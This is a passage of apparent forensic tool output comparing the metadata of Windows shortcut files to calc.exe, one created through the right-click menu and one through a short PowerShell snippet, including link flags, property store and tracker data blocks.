5c:26:0a:24:29:6f 92 | Birth Droid ID Time : Tue Sep 18 10:39:24 2018 UTC 93 | Birth Droid ID Seq Num: 7175 94 | Birth Droid Node ID : 5c:26:0a:24:29:6f 95 | 96 | ------------------------------------------------------------------------------------- 97 | Right-click, Choose New, then Shortcut 98 | 99 | Metadata: 100 | File: d:\cases\lnk\rc_calc.lnk 101 | guid {00021401-0000-0000-c000-000000000046} 102 | mtime Wed Apr 11 23:34:36 2018 Z 103 | atime Wed Apr 11 23:34:36 2018 Z 104 | ctime Wed Apr 11 23:34:36 2018 Z 105 | workingdir C:\windows\system32 106 | basepath C:\Windows\System32\calc.exe 107 | shitemidlist My Computer/C:\/Windows/System32/calc.exe 108 | **Shell Items Details (times in UTC)** 109 | C:2018-04-11 21:04:34 M:2019-02-12 22:34:26 A:2019-02-12 22:34:26 Windows (9) 110 | C:2018-04-11 21:04:34 M:2019-03-25 14:18:14 A:2019-03-25 14:18:14 System32 (9) 111 | C:2018-04-11 23:34:38 M:2018-04-11 23:34:38 A:2018-04-11 23:34:38 calc.exe (9) 112 | vol_sn 22D3-06AE 113 | vol_type Fixed Disk 114 | hotkey 0x0 115 | showcmd 0x1 116 | 117 | ***LinkFlags*** 118 | HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasLinkInfo|EnableTargetMetadata 119 | 120 | ***PropertyStoreDataBlock*** 121 | GUID/ID pairs: 122 | {28636aa6-953d-11d2-b5d6-00c04fd918d0}/30 ParsingPath: C:\Windows\System32\calc.exe 123 | {446d16b1-8dad-4870-a748-402ea43d788c}/104 124 | {46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-3855314428-4085452759-4066589348-1000 125 | {b725f130-47ef-101a-a5f1-02608c9eebac}/10 ItemNameDisplay: calc.exe 126 | {b725f130-47ef-101a-a5f1-02608c9eebac}/12 Size: 27648 127 | {b725f130-47ef-101a-a5f1-02608c9eebac}/14 DateModified: Wed Apr 11 23:34:36 2018 Z 128 | {b725f130-47ef-101a-a5f1-02608c9eebac}/15 DateCreated : Wed Apr 11 23:34:38 2018 Z 129 | {b725f130-47ef-101a-a5f1-02608c9eebac}/4 ItemType: Application 130 | {dabd30ed-0043-4789-a7f8-d013a4736622}/100 ItemFolderPathDisplay: System32 (C:\Windows) 131 | 132 | ***KnownFolderDataBlock*** 133 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 134 | Folder: CSIDL_SYSTEM 135 | 136 | ***TrackerDataBlock*** 137 | Machine ID : enzo 138 | New Droid ID Time : Tue Sep 18 10:39:24 2018 UTC 139 | New Droid ID Seq Num : 7175 140 | New Droid Node ID : 5c:26:0a:24:29:6f 141 | Birth Droid ID Time : Tue Sep 18 10:39:24 2018 UTC 142 | Birth Droid ID Seq Num: 7175 143 | Birth Droid Node ID : 5c:26:0a:24:29:6f 144 | 145 | 146 | ------------------------------------------------------------------------------------- 147 | Use of PowerShell to create a Windows shortcut to calc.exe 148 | 149 | $WshShell = New-Object -ComObject WScript.Shell 150 | $Shortcut = $WshShell.CreateShortcut("ps_calc.lnk") 151 | $Shortcut.TargetPath = "C:\Windows\system32\calc.exe" 152 | $Shortcut.Save() 153 | 154 | Metadata: 155 | File: d:\cases\lnk\ps_calc.tst 156 | guid {00021401-0000-0000-c000-000000000046} 157 | mtime Wed Apr 11 23:34:36 2018 Z 158 | atime Wed Apr 11 23:34:36 2018 Z 159 | ctime Wed Apr 11 23:34:36 2018 Z 160 | basepath C:\Windows\System32\calc.exe 161 | shitemidlist My Computer/C:\/Windows/System32/calc.exe 162 | **Shell Items Details (times in UTC)** 163 | C:2018-04-11 21:04:34 M:2019-02-12 22:34:26 A:2019-02-12 22:34:26 Windows (9) 164 | C:2018-04-11 21:04:34 M:2019-03-12 23:25:46 A:2019-03-12 23:25:46 System32 (9) 165 | C:2018-04-11 23:34:38 M:2018-04-11 23:34:38 A:2018-04-11 23:34:38 calc.exe (9) 166 | vol_sn 22D3-06AE 167 | vol_type Fixed Disk 168 | hotkey 0x0 169 | showcmd 0x1 170 | 171 | ***LinkFlags*** 172 | HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasRelativePath 173 | 174 | ***PropertyStoreDataBlock*** 175 | GUID/ID pairs: 176 | {446d16b1-8dad-4870-a748-402ea43d788c}/104 177 | {46588ae2-4cbc-4338-bbfc-139326986dce}/4 SID: S-1-5-21-3855314428-4085452759-4066589348-1000 178 | 179 | ***KnownFolderDataBlock*** 180 | GUID : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7} 181 | Folder: CSIDL_SYSTEM 182 | 183 | ***TrackerDataBlock*** 184 | Machine ID : enzo 185 | New Droid ID Time : Tue Sep 18 10:39:24 2018 UTC 186 | New Droid ID Seq Num : 7175 187 | New Droid Node ID : 5c:26:0a:24:29:6f 188 | Birth Droid ID Time : Tue Sep 18 10:39:24 2018 UTC 189 | Birth Droid ID Seq Num: 7175 190 | Birth Droid Node ID : 5c:26:0a:24:29:6f 191 | --------------------------------------------------------------------------------